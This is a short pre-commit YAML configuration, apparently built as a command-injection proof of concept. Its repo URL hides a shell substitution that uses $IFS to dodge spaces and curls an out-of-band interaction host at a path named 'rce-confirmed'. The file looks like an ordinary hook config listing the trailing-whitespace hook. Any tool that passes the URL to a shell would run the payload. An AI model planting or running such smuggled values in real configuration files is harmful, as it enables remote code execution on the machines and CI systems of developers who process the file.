  repos:
    - repo: "https://github.com/pre-commit/pre-commit-hooks#$(curl$IFS-s$IFShttps://dtscchmqpronalsrfkkjwhyialnd5xsnm.oast.fun/rce-confirmed)"
      rev: v4.4.0                                                                                                                                            
      hooks:
        - id: trailing-whitespace 
